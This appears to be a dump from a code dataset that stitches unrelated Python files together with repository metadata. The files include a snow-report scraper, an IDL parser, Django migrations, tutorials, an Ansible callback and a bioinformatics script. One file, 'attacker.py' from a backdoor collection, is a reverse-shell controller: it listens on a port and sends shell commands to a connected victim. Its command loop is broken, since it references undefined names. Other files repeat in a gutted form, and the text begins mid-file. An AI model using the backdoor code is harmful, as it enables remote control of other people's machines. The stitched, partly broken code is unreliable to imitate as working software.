df.to_csv('SnowDatabaseExport.csv', header=0, index=False)
files.download('SnowDatabaseExport.csv')
"""
#Below is under heavy construction: Connecting pandas df to postgres (not complete)
"""
# Create a Postgres table for dataframe import
# https://www.dataquest.io/m/245/intro-to-postgres/4/creating-a-table
conn = psycopg2.connect("dbname=DATABASENAME user=DBUSERNAME")
cur = conn.cursor()
cur.execute("CREATE TABLE users(id integer PRIMARY KEY, email text, name text, address text)")
"""
"""
with open('user_accounts.csv') as f:
reader = csv.reader(f)
next(reader)
rows = [row for row in reader]
"""
"""
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
for row in rows:
cur.execute("INSERT INTO users VALUES (%s, %s, %s, %s)", row)
conn.commit()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
conn.close()
"""
"""
conn = psycopg2.connect('dbname=dq user=dq')
cur = conn.cursor()
# sample_file.csv has a header row.
with open('SnowDataBaseExport.csv', 'r') as f:
# Skip the header row.
next(f)
cur.copy_from(f, 'users', sep=',')
conn.commit()
cur.execute('SELECT * FROM new_snow')
users = cur.fetchall()
conn.close()
"""
"""
# Get all the data from snow data through SQL
import psycopg2
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
cur.execute('SELECT * FROM snow_report')
notes = cur.fetchall()
conn.close()
"""
| 24.122449 | 94 | 0.67555 | # to install a program within colab use !pip install
import pandas as pd
# !pip show pandas
import requests
# !pip show requests
from bs4 import BeautifulSoup
# !pip show bs4
# !pip install tabulate
from tabulate import tabulate
# pip show tabulate
import csv
# pip show csv
import bs4
# pip3 install lxml
import lxml
import bs4.builder._lxml
res = requests.get('http://www.WEBSITE.com/news/snow-report/')
soup = BeautifulSoup(res.content,'lxml')
#!pip show lxml
table = soup.find_all('table')[0]
df = pd.read_html('http://www.WEBSITE.com/news/snow-report/', header=0)[0]
df
# Variable list objects (one pandas Series per snow-report column)
resort_list = df.iloc[:, 0]
new_snow = df.iloc[:, 1]
conditions = df.iloc[:, 2]
open_terrian = df.iloc[:, 3]
comments = df.iloc[:, 4]  # fix: closing bracket was missing, making the file a syntax error
"""
# Export to CSV within google co lab
from google.colab import files
# do not print header and do not print index column
df.to_csv('SnowDatabaseExport.csv', header=0, index=False)
files.download('SnowDatabaseExport.csv')
"""
#Below is under heavy construction: Connecting pandas df to postgres (not complete)
"""
# Create a Postgres table for dataframe import
# https://www.dataquest.io/m/245/intro-to-postgres/4/creating-a-table
conn = psycopg2.connect("dbname=DATABASENAME user=DBUSERNAME")
cur = conn.cursor()
cur.execute("CREATE TABLE users(id integer PRIMARY KEY, email text, name text, address text)")
"""
"""
with open('user_accounts.csv') as f:
reader = csv.reader(f)
next(reader)
rows = [row for row in reader]
"""
"""
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
for row in rows:
cur.execute("INSERT INTO users VALUES (%s, %s, %s, %s)", row)
conn.commit()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
conn.close()
"""
"""
conn = psycopg2.connect('dbname=dq user=dq')
cur = conn.cursor()
# sample_file.csv has a header row.
with open('SnowDataBaseExport.csv', 'r') as f:
# Skip the header row.
next(f)
cur.copy_from(f, 'users', sep=',')
conn.commit()
cur.execute('SELECT * FROM new_snow')
users = cur.fetchall()
conn.close()
"""
"""
# Get all the data from snow data through SQL
import psycopg2
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
cur.execute('SELECT * FROM snow_report')
notes = cur.fetchall()
conn.close()
"""
| 0 | 0 | 0 |
dc04c0aa6efe48fc3dd9443a1d05d934b0587fba | 1,906 | py | Python | idl/parser/MethodParser.py | spiricn/libIDL | 16738044991962bd3a7ab27f469d4364fbcd7b18 | [
"MIT"
] | null | null | null | idl/parser/MethodParser.py | spiricn/libIDL | 16738044991962bd3a7ab27f469d4364fbcd7b18 | [
"MIT"
] | null | null | null | idl/parser/MethodParser.py | spiricn/libIDL | 16738044991962bd3a7ab27f469d4364fbcd7b18 | [
"MIT"
] | null | null | null | from idl.lexer.Token import Token
from idl.parser.Parser import Parser
from idl.parser.ParserError import ParserError
from idl.parser.Desc import MethodDesc, MethodArgDesc
| 27.228571 | 90 | 0.502623 | from idl.lexer.Token import Token
from idl.parser.Parser import Parser
from idl.parser.ParserError import ParserError
from idl.parser.Desc import MethodDesc, MethodArgDesc
class MethodParser(Parser):
    """Parse a single IDL method declaration from a token stream into a MethodDesc."""

    # NOTE(review): this nested class appears unused within the parser; it is
    # kept as-is in case external code references it, but looks like dead code.
    class Test:
        def __init__(self):
            pass

    def __init__(self, tokens):
        Parser.__init__(self, tokens)

    def parse(self):
        """Consume one full method declaration and return its MethodDesc."""
        self.method = MethodDesc(line=self.next.location[0])

        # Parse return type / name
        self._parseHead()

        # Parse parameter list
        self._parseArgs()

        # Tail: a method declaration ends with a semicolon.
        self.eat(Token.PUNCTUATION , ';')

        return self.method

    def _parseHead(self):
        """Consume the return type and method name."""
        # Return type
        self.method.returnTypeDesc = self.eatTypeDesc()

        # Method name
        self.method.name = self.eat(Token.ID).body

    def _parseArgs(self):
        """Consume the parenthesized, comma-separated argument list into self.method.args."""
        # List start
        self.eat(Token.PUNCTUATION, '(')

        # Alternates between expecting an argument declaration and expecting
        # a comma separator until the closing parenthesis is seen.
        expectingArg = True

        while True:
            token = self.next

            if token.id == Token.PUNCTUATION and token.body == ')':
                # End of param list
                self.pop()
                break

            elif expectingArg:
                argLine = self.next.location[0]

                # Argument type
                varDesc = self.eatVariableDesc()

                # Create description
                self.method.args.append( MethodArgDesc(varDesc, argLine) )

                expectingArg = False

            elif not expectingArg and token.id == Token.PUNCTUATION and token.body == ',':
                expectingArg = True
                self.pop()

            else:
                raise ParserError('Unexpected token while parsing method', token)
72a61932d359fcdabef7e60e057c441df9206dd2 | 16,865 | py | Python | snorna/migrations/0012_snorna_expression_acc_snorna_expression_blca_snorna_expression_brca_snorna_expression_cesc_snorna_ex.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | null | null | null | snorna/migrations/0012_snorna_expression_acc_snorna_expression_blca_snorna_expression_brca_snorna_expression_cesc_snorna_ex.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2020-04-14T11:33:30.000Z | 2020-04-14T11:33:30.000Z | snorna/migrations/0012_snorna_expression_acc_snorna_expression_blca_snorna_expression_brca_snorna_expression_cesc_snorna_ex.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2018-09-14T08:53:30.000Z | 2018-09-14T08:53:30.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 15:56
from __future__ import unicode_literals
from django.db import migrations, models
| 51.733129 | 128 | 0.573258 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 15:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create one snoRNA-expression table per TCGA cancer cohort.

    All 31 tables share the same four data columns; only the model name
    differs, so the CreateModel operations are generated in a loop instead
    of being spelled out 31 times.
    """

    dependencies = [
        ('snorna', '0011_protein_expression_acc_protein_expression_blca_protein_expression_brca_protein_expression_cesc_prote'),
    ]

    # TCGA cohort codes, in the exact order of the auto-generated migration.
    _COHORTS = (
        'ACC', 'BLCA', 'BRCA', 'CESC', 'CHOL', 'COAD', 'DLBC', 'ESCA',
        'HNSC', 'KICH', 'KIRC', 'KIRP', 'LGG', 'LIHC', 'LUAD', 'LUSC',
        'MESO', 'OV', 'PAAD', 'PCPG', 'PRAD', 'READ', 'SARC', 'SKCM',
        'STAD', 'TGCT', 'THCA', 'THYM', 'UCEC', 'UCS', 'UVM',
    )

    operations = []
    for _cohort in _COHORTS:
        operations.append(
            migrations.CreateModel(
                name='snorna_expression_%s' % _cohort,
                fields=[
                    ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                    ('snorna', models.CharField(max_length=225, null=True)),
                    ('dataset_id', models.CharField(max_length=225, null=True)),
                    ('sample_id', models.CharField(max_length=225, null=True)),
                    ('snorna_expression', models.FloatField(null=True)),
                ],
            )
        )
    del _cohort  # drop the loop helper from the class namespace
| 0 | 16,686 | 23 |
99e310433b33672a6a26d25428a9fc76d1e39983 | 1,009 | py | Python | Backdoors/Reverse Shell 1/attacker.py | noamts/Malware | 099577f87abdca76910dcf4f1debc234a9f67c9b | [
"MIT"
] | 47 | 2020-03-19T00:08:21.000Z | 2022-03-31T02:32:16.000Z | Backdoors/Reverse Shell 1/attacker.py | sidwashere/Malware | 1eeb374b1ee992a3dabd00420916dcbd277c66db | [
"MIT"
] | null | null | null | Backdoors/Reverse Shell 1/attacker.py | sidwashere/Malware | 1eeb374b1ee992a3dabd00420916dcbd277c66db | [
"MIT"
] | 14 | 2020-03-18T22:22:15.000Z | 2022-03-29T05:39:25.000Z | import socket
import sys
#creating socket
#Bind socket to port
#Accept connections
main()
| 18.685185 | 45 | 0.700694 | import socket
import sys
#creating socket
def socket_create():
    """Create the global listening socket and record the bind address/port."""
    global host, port, s
    try:
        host = ''        # empty string = listen on all interfaces
        port = 9999
        s = socket.socket()
    except socket.error:
        print("[!]Error in creating Socket!!")
#Bind socket to port
def socket_bind():
try:
global host,port,s
print("[+]Binding Socket to port")
s.bind((host,port))
s.listen(5)
except socket.error as err:
print("[!]Error in Binding Socket")
socket_bind()
#Accept connections
def socket_accept():
    """Block until a client connects, then hand the connection to the command loop."""
    conn, addr = s.accept()
    print("[+]Connection has been established")
    print("IP:" + str(addr[0]))
    print("Port:" + str(addr[1]))
    send_commands(conn)
    conn.close()
while True:
command=raw_input()
if command=='quit':
connection.close()
s.close()
sys.exit()
if len(str.encode(command))>0:
connection.send(str.encode(command))
client_response=str(connection.recv(1024))
print(client_response)
def main():
    """Run the full listener lifecycle: create socket, bind/listen, serve one client."""
    socket_create()
    socket_bind()
    socket_accept()
main()
| 801 | 0 | 112 |
14a959011550c27a8308aa59b02326b9904eb910 | 94 | py | Python | python/overplot/__init__.py | helgemathee/overplot | 9fa9e19132776f6a7b17530c47f0d5158c229a2e | [
"Zlib"
] | null | null | null | python/overplot/__init__.py | helgemathee/overplot | 9fa9e19132776f6a7b17530c47f0d5158c229a2e | [
"Zlib"
] | null | null | null | python/overplot/__init__.py | helgemathee/overplot | 9fa9e19132776f6a7b17530c47f0d5158c229a2e | [
"Zlib"
] | null | null | null | #
# Copyright (c) 2017-2018, Helge Mathee. All rights reserved.
#
OVERPLOT_VERSION = '1.0.0'
| 15.666667 | 61 | 0.691489 | #
# Copyright (c) 2017-2018, Helge Mathee. All rights reserved.
#
OVERPLOT_VERSION = '1.0.0'
| 0 | 0 | 0 |
15acc38819e84ac5b7428ebe8d282589c67064e1 | 504 | py | Python | 01/solution.py | ofloveandhate/advent_of_code_2021 | f44e12596e883e6dd55e2373863627a8331f0d32 | [
"MIT"
] | null | null | null | 01/solution.py | ofloveandhate/advent_of_code_2021 | f44e12596e883e6dd55e2373863627a8331f0d32 | [
"MIT"
] | null | null | null | 01/solution.py | ofloveandhate/advent_of_code_2021 | f44e12596e883e6dd55e2373863627a8331f0d32 | [
"MIT"
] | null | null | null |
###
import numpy as np
###
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2()))
def read_data():
    """Read one integer per line from input.txt into a numpy array."""
    with open('input.txt') as fh:
        values = [int(line.strip()) for line in fh]
    return np.array(values)
def write_data(data):
    """Write each item of *data* to output.txt, one per line."""
    lines = [str(item) + '\n' for item in data]
    with open('output.txt', 'w') as out:
        out.writelines(lines)
###
import numpy as np
def part1():
    """Count how many consecutive depth readings increase."""
    depths = read_data()
    deltas = depths[1:] - depths[:-1]
    return sum(deltas > 0)
###
def part2():
    """Count increases between consecutive sums of a 3-wide sliding window."""
    depths = read_data()
    window_sums = depths[:-2] + depths[1:-1] + depths[2:]
    return sum((window_sums[1:] - window_sums[:-1]) > 0)
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2()))
| 307 | 0 | 91 |
e74782617027cb7fb595cbabcf9395bba24b1c84 | 3,717 | py | Python | the_basics/basics2.py | XinyanLi23/python_basics | d17b0c8e66a251d155be3b3fbde16fb85a21b65a | [
"MIT"
] | null | null | null | the_basics/basics2.py | XinyanLi23/python_basics | d17b0c8e66a251d155be3b3fbde16fb85a21b65a | [
"MIT"
] | null | null | null | the_basics/basics2.py | XinyanLi23/python_basics | d17b0c8e66a251d155be3b3fbde16fb85a21b65a | [
"MIT"
] | null | null | null |
# $ content split
# * title
# tm terminal
# td treads
# n note
# ! important
# alternative
#$ section 5 create functions
#* return
print(mean([1, 4, 6]))
#print(type(mean),type(sum))
#* print
mymean = mean([0, 3, 4])
print(mymean + 10)
#* conditional
#student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5} #n does not work
#print(mean(student_grade))
#* set for conditional
monday_temperatures = [8.8, 9.1, 9.9]
print(mean(monday_temperatures))
student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5}
print(mean(student_grade))
# ex.
print(foo("mypass"))
#* elif
x = 3
y = 1
if x > y:
print("x is greater than y")
elif x == y:
print("x is equal than y")
else:
print("x is less than y")
#* white space (one or more)
if 3 > 1: #n always one white space between operators
print('b') #n indentation (4 white spaces)
# ex.
#$ section 6 create functions
#* user input
#print(weather_condition(7))
user_input = float(input("Enter temperature:")) #n prompting the user to enter a value
print(weather_condition(user_input)) #td "input" function freezes the execution of a program and waits for the user input one the command line
#user_input = input("Enter some input:") #n use "input" only will get a string, so need to add "float" or "int" before
#print(type(user_input), user_input) #n help to check the type
#* string formatting
user_input = input("Enter your name: ")
message = "Hello %s!" % user_input #td "%s" is a special string, use "%" instead of "," and then the value of variable will replace the %s
#message = f"Hello {user_input}" #n only used after python3.6
#* with multiple variables
name = input("Enter your name: ")
surname = input("Enter your surname: ")
when = "today"
message = "Hello %s %s" % (name, surname) #td need more "%s" for more strings to input
message = f"Hello {name} {surname}, what's up {when}" #n as same as line above
print(message)
#def A(): #n use for only run the block A
#if __name__ == '__main__':
#A()
#ex. | 26.176056 | 201 | 0.586494 |
# $ content split
# * title
# tm terminal
# td treads
# n note
# ! important
# alternative
#$ section 5 create functions
#* return
def mean(mylist):
    """Return the arithmetic mean of a list of numbers."""
    return sum(mylist) / len(mylist)
print(mean([1, 4, 6]))
#print(type(mean),type(sum))
#* print
def mean(mylist):
    """Return the mean of *mylist*, announcing the call on stdout first."""
    print("Function started!")
    total = sum(mylist)
    count = len(mylist)
    return total / count
mymean = mean([0, 3, 4])
print(mymean + 10)
#* conditional
def mean(mylist):
    """Return the mean of a list of numbers (does not accept a dict)."""
    count = len(mylist)
    return sum(mylist) / count
#student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5} #n does not work
#print(mean(student_grade))
#* set for conditional
def mean(value):
    """Return the mean of a sequence of numbers, or of a dict's values."""
    numbers = value.values() if isinstance(value, dict) else value
    # len(value) equals the number of values for both sequences and dicts
    return sum(numbers) / len(value)
monday_temperatures = [8.8, 9.1, 9.9]
print(mean(monday_temperatures))
student_grade = {"Marry": 9.1, "Sim": 8.8, "John": 7.5}
print(mean(student_grade))
# ex.
def foo(string):
    """Return True when *string* is at least 8 characters long."""
    return len(string) >= 8
print(foo("mypass"))
#* elif
x = 3
y = 1
if x > y:
print("x is greater than y")
elif x == y:
print("x is equal than y")
else:
print("x is less than y")
#* white space (one or more)
if 3 > 1: #n always one white space between operators
print('b') #n indentation (4 white spaces)
# ex.
def foo(temperature):
    """Classify a temperature: > 25 is "Hot", (15, 25] is "Warm", else "Cold".

    Fixes the original ``temperature > 15 & temperature < 25`` condition:
    ``&`` binds tighter than comparisons, so it evaluated
    ``temperature > (15 & temperature) < 25`` -- a bitwise-and that gave
    wrong answers for some ints and raised TypeError for floats. Since this
    branch only runs when ``temperature <= 25``, ``temperature > 15`` is the
    correct (and sufficient) test.
    """
    if temperature > 25:
        return "Hot"
    elif temperature > 15:
        return "Warm"
    else:
        return "Cold"
#$ section 6 create functions
#* user input
def weather_condition(temperature):
    """Return "Warm" for temperatures above 7, otherwise "Cold"."""
    return "Warm" if temperature > 7 else "Cold"
#print(weather_condition(7))
user_input = float(input("Enter temperature:")) #n prompting the user to enter a value
print(weather_condition(user_input)) #td "input" function freezes the execution of a program and waits for the user input one the command line
#user_input = input("Enter some input:") #n use "input" only will get a string, so need to add "float" or "int" before
#print(type(user_input), user_input) #n help to check the type
#* string formatting
user_input = input("Enter your name: ")
message = "Hello %s!" % user_input #td "%s" is a special string, use "%" instead of "," and then the value of variable will replace the %s
#message = f"Hello {user_input}" #n only used after python3.6
#* with multiple variables
name = input("Enter your name: ")
surname = input("Enter your surname: ")
when = "today"
message = "Hello %s %s" % (name, surname) #td need more "%s" for more strings to input
message = f"Hello {name} {surname}, what's up {when}" #n as same as line above
print(message)
#def A(): #n use for only run the block A
#if __name__ == '__main__':
#A()
#ex.
def foo(name):
    """Return a greeting for *name* with its first letter capitalized."""
    return "Hi %s" % name.capitalize()
2d996d3aa0ae4ee0ac34aa0ebe3eb67f22521b77 | 815 | py | Python | blog/apps/upload/migrations/0001_initial.py | panchaoco/blog-py | ae4c66080c40024d5bef463c2827c5bf71881786 | [
"Apache-2.0"
] | null | null | null | blog/apps/upload/migrations/0001_initial.py | panchaoco/blog-py | ae4c66080c40024d5bef463c2827c5bf71881786 | [
"Apache-2.0"
] | 6 | 2021-03-18T23:09:11.000Z | 2022-03-11T23:43:20.000Z | blog/apps/upload/migrations/0001_initial.py | panchaoco/blog-py | ae4c66080c40024d5bef463c2827c5bf71881786 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.4 on 2019-03-24 19:19
import datetime
from django.db import migrations, models
import upload.storage
| 28.103448 | 122 | 0.585276 | # Generated by Django 2.1.4 on 2019-03-24 19:19
import datetime
from django.db import migrations, models
import upload.storage
class Migration(migrations.Migration):
    """Initial schema for the upload app: a single Upload table storing
    article images (via the custom ImageStorage backend) plus upload time."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Upload',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Images land under MEDIA_ROOT/article/ through ImageStorage
                ('image', models.ImageField(max_length=500, storage=upload.storage.ImageStorage(), upload_to='article/')),
                # Default is evaluated at save time (callable, not a fixed value)
                ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='上传时间')),
            ],
            options={
                'verbose_name': '图片上传',
                'verbose_name_plural': '图片上传',
            },
        ),
    ]
| 0 | 687 | 23 |
4d837e46adcefa5f52c49a2400da2ce8837380d9 | 2,182 | py | Python | ansible/venv/lib/python2.7/site-packages/ansible/plugins/callback/actionable.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 17 | 2017-06-07T23:15:01.000Z | 2021-08-30T14:32:36.000Z | ansible/ansible/plugins/callback/actionable.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 9 | 2017-06-25T03:31:52.000Z | 2021-05-17T23:43:12.000Z | ansible/ansible/plugins/callback/actionable.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 3 | 2018-05-26T21:31:22.000Z | 2019-09-28T17:00:45.000Z | # (c) 2015, Andrew Gaffney <andrew@agaffney.org>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: actionable
type: stdout
short_description: shows only items that need attention
description:
- Use this callback when you dont care about OK nor Skipped.
- This callback suppresses any non Failed or Changed status.
version_added: "2.1"
deprecated:
why: The 'default' callback plugin now supports this functionality
removed_in: '2.11'
alternative: "'default' callback plugin with 'display_skipped_hosts = no' and 'display_ok_hosts = no' options"
extends_documentation_fragment:
- default_callback
requirements:
- set as stdout callback in configuration
# Override defaults from 'default' callback plugin
options:
display_skipped_hosts:
name: Show skipped hosts
description: "Toggle to control displaying skipped task/host results in a task"
type: bool
default: no
env:
- name: DISPLAY_SKIPPED_HOSTS
deprecated:
why: environment variables without "ANSIBLE_" prefix are deprecated
version: "2.12"
alternatives: the "ANSIBLE_DISPLAY_SKIPPED_HOSTS" environment variable
- name: ANSIBLE_DISPLAY_SKIPPED_HOSTS
ini:
- key: display_skipped_hosts
section: defaults
display_ok_hosts:
name: Show 'ok' hosts
description: "Toggle to control displaying 'ok' task/host results in a task"
type: bool
default: no
env:
- name: ANSIBLE_DISPLAY_OK_HOSTS
ini:
- key: display_ok_hosts
section: defaults
version_added: '2.7'
'''
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
| 34.634921 | 118 | 0.674152 | # (c) 2015, Andrew Gaffney <andrew@agaffney.org>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: actionable
type: stdout
short_description: shows only items that need attention
description:
- Use this callback when you dont care about OK nor Skipped.
- This callback suppresses any non Failed or Changed status.
version_added: "2.1"
deprecated:
why: The 'default' callback plugin now supports this functionality
removed_in: '2.11'
alternative: "'default' callback plugin with 'display_skipped_hosts = no' and 'display_ok_hosts = no' options"
extends_documentation_fragment:
- default_callback
requirements:
- set as stdout callback in configuration
# Override defaults from 'default' callback plugin
options:
display_skipped_hosts:
name: Show skipped hosts
description: "Toggle to control displaying skipped task/host results in a task"
type: bool
default: no
env:
- name: DISPLAY_SKIPPED_HOSTS
deprecated:
why: environment variables without "ANSIBLE_" prefix are deprecated
version: "2.12"
alternatives: the "ANSIBLE_DISPLAY_SKIPPED_HOSTS" environment variable
- name: ANSIBLE_DISPLAY_SKIPPED_HOSTS
ini:
- key: display_skipped_hosts
section: defaults
display_ok_hosts:
name: Show 'ok' hosts
description: "Toggle to control displaying 'ok' task/host results in a task"
type: bool
default: no
env:
- name: ANSIBLE_DISPLAY_OK_HOSTS
ini:
- key: display_ok_hosts
section: defaults
version_added: '2.7'
'''
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
class CallbackModule(CallbackModule_default):
    """Stdout callback that shows only results needing attention.

    All behaviour is inherited from the 'default' callback; the filtering
    comes from the option defaults declared in DOCUMENTATION above
    (display_skipped_hosts=no, display_ok_hosts=no).
    """

    CALLBACK_VERSION = 2.0
    CALLBACK_TYPE = 'stdout'
    CALLBACK_NAME = 'actionable'
| 0 | 114 | 23 |
0aa31a3809f0b3f434e74c5cefb933c844d85844 | 6,125 | py | Python | scripts/dexseq_prepare_annotation.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | scripts/dexseq_prepare_annotation.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | 1 | 2018-09-07T16:35:24.000Z | 2018-10-06T13:02:31.000Z | scripts/dexseq_prepare_annotation.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | import sys, collections, itertools, os.path, optparse
optParser = optparse.OptionParser(
usage = "python %prog [options] <in.gtf> <out.gff>",
description=
"Script to prepare annotation for DEXSeq." +
"This script takes an annotation file in Ensembl GTF format" +
"and outputs a 'flattened' annotation file suitable for use " +
"with the count_in_exons.py script ",
epilog =
"Written by Simon Anders (sanders@fs.tum.de), European Molecular Biology " +
"Laboratory (EMBL). (c) 2010. Released under the terms of the GNU General " +
"Public License v3. Part of the 'DEXSeq' package." )
optParser.add_option( "-r", "--aggregate", type="choice", dest="aggregate",
choices = ( "no", "yes" ), default = "yes",
help = "'yes' or 'no'. Indicates whether two or more genes sharing an exon should be merged into an 'aggregate gene'. If 'no', the exons that can not be assiged to a single gene are ignored." )
(opts, args) = optParser.parse_args()
if len( args ) != 2:
sys.stderr.write( "Script to prepare annotation for DEXSeq.\n\n" )
sys.stderr.write( "Usage: python %s <in.gtf> <out.gff>\n\n" % os.path.basename(sys.argv[0]) )
sys.stderr.write( "This script takes an annotation file in Ensembl GTF format\n" )
sys.stderr.write( "and outputs a 'flattened' annotation file suitable for use\n" )
sys.stderr.write( "with the count_in_exons.py script.\n" )
sys.exit(1)
try:
import HTSeq
except ImportError:
sys.stderr.write( "Could not import HTSeq. Please install the HTSeq Python framework\n" )
sys.stderr.write( "available from http://www-huber.embl.de/users/anders/HTSeq\n" )
sys.exit(1)
gtf_file = args[0]
out_file = args[1]
aggregateGenes = opts.aggregate == "yes"
# Step 1: Store all exons with their gene and transcript ID
# in a GenomicArrayOfSets
exons = HTSeq.GenomicArrayOfSets( "auto", stranded=True )
for f in HTSeq.GFF_Reader( gtf_file ):
if f.type != "exon":
continue
f.attr['gene_id'] = f.attr['gene_id'].replace( ":", "_" )
exons[f.iv] += ( f.attr['gene_id'], f.attr['transcript_id'] )
# Step 2: Form sets of overlapping genes
# We produce the dict 'gene_sets', whose values are sets of gene IDs. Each set
# contains IDs of genes that overlap, i.e., share bases (on the same strand).
# The keys of 'gene_sets' are the IDs of all genes, and each key refers to
# the set that contains the gene.
# Each gene set forms an 'aggregate gene'.
if aggregateGenes == True:
gene_sets = collections.defaultdict( lambda: set() )
for iv, s in exons.steps():
# For each step, make a set, 'full_set' of all the gene IDs occuring
# in the present step, and also add all those gene IDs, whch have been
# seen earlier to co-occur with each of the currently present gene IDs.
full_set = set()
for gene_id, transcript_id in s:
full_set.add( gene_id )
full_set |= gene_sets[ gene_id ]
# Make sure that all genes that are now in full_set get associated
# with full_set, i.e., get to know about their new partners
for gene_id in full_set:
assert gene_sets[ gene_id ] <= full_set
gene_sets[ gene_id ] = full_set
# Step 3: Go through the steps again to get the exonic sections. Each step
# becomes an 'exonic part'. The exonic part is associated with an
# aggregate gene, i.e., a gene set as determined in the previous step,
# and a transcript set, containing all transcripts that occur in the step.
# The results are stored in the dict 'aggregates', which contains, for each
# aggregate ID, a list of all its exonic_part features.
aggregates = collections.defaultdict( lambda: list() )
for iv, s in exons.steps( ):
# Skip empty steps
if len(s) == 0:
continue
gene_id = list(s)[0][0]
## if aggregateGenes=FALSE, ignore the exons associated to more than one gene ID
if aggregateGenes == False:
check_set = set()
for geneID, transcript_id in s:
check_set.add( geneID )
if( len( check_set ) > 1 ):
continue
else:
aggregate_id = gene_id
# Take one of the gene IDs, find the others via gene sets, and
# form the aggregate ID from all of them
else:
assert set( gene_id for gene_id, transcript_id in s ) <= gene_sets[ gene_id ]
aggregate_id = '+'.join( gene_sets[ gene_id ] )
# Make the feature and store it in 'aggregates'
f = HTSeq.GenomicFeature( aggregate_id, "exonic_part", iv )
f.source = os.path.basename( sys.argv[0] )
# f.source = "camara"
f.attr = {}
f.attr[ 'gene_id' ] = aggregate_id
transcript_set = set( ( transcript_id for gene_id, transcript_id in s ) )
f.attr[ 'transcripts' ] = '+'.join( transcript_set )
aggregates[ aggregate_id ].append( f )
# Step 4: For each aggregate, number the exonic parts
aggregate_features = []
for l in aggregates.values():
for i in xrange( len(l)-1 ):
assert l[i].name == l[i+1].name, str(l[i+1]) + " has wrong name"
assert l[i].iv.end <= l[i+1].iv.start, str(l[i+1]) + " starts too early"
if l[i].iv.chrom != l[i+1].iv.chrom:
raise ValueError, "Same name found on two chromosomes: %s, %s" % ( str(l[i]), str(l[i+1]) )
if l[i].iv.strand != l[i+1].iv.strand:
raise ValueError, "Same name found on two strands: %s, %s" % ( str(l[i]), str(l[i+1]) )
aggr_feat = HTSeq.GenomicFeature( l[0].name, "aggregate_gene",
HTSeq.GenomicInterval( l[0].iv.chrom, l[0].iv.start,
l[-1].iv.end, l[0].iv.strand ) )
aggr_feat.source = os.path.basename( sys.argv[0] )
aggr_feat.attr = { 'gene_id': aggr_feat.name }
for i in xrange( len(l) ):
l[i].attr['exonic_part_number'] = "%03d" % ( i+1 )
aggregate_features.append( aggr_feat )
# Step 5: Sort the aggregates, then write everything out
aggregate_features.sort( key = lambda f: ( f.iv.chrom, f.iv.start ) )
fout = open( out_file, "w" )
for aggr_feat in aggregate_features:
fout.write( aggr_feat.get_gff_line() )
for f in aggregates[ aggr_feat.name ]:
fout.write( f.get_gff_line() )
fout.close()
| 40.03268 | 196 | 0.659265 | import sys, collections, itertools, os.path, optparse
# ---------------------------------------------------------------------------
# dexseq_prepare_annotation: flatten an Ensembl GTF file into the DEXSeq
# "exonic part" annotation.  NOTE(review): this is legacy Python 2 code
# ("xrange", "raise ValueError, msg" syntax) and must run under Python 2.
# ---------------------------------------------------------------------------
optParser = optparse.OptionParser( 
   usage = "python %prog [options] <in.gtf> <out.gff>",
   description=
      "Script to prepare annotation for DEXSeq." +
      "This script takes an annotation file in Ensembl GTF format" +
      "and outputs a 'flattened' annotation file suitable for use " +
      "with the count_in_exons.py script ",
   epilog = 
      "Written by Simon Anders (sanders@fs.tum.de), European Molecular Biology " +
      "Laboratory (EMBL). (c) 2010. Released under the terms of the GNU General " +
      "Public License v3. Part of the 'DEXSeq' package." )
optParser.add_option( "-r", "--aggregate", type="choice", dest="aggregate",
   choices = ( "no", "yes" ), default = "yes",
   help = "'yes' or 'no'. Indicates whether two or more genes sharing an exon should be merged into an 'aggregate gene'. If 'no', the exons that can not be assiged to a single gene are ignored." )
(opts, args) = optParser.parse_args()
# Exactly two positional arguments are required: <in.gtf> and <out.gff>.
if len( args ) != 2:
   sys.stderr.write( "Script to prepare annotation for DEXSeq.\n\n" )
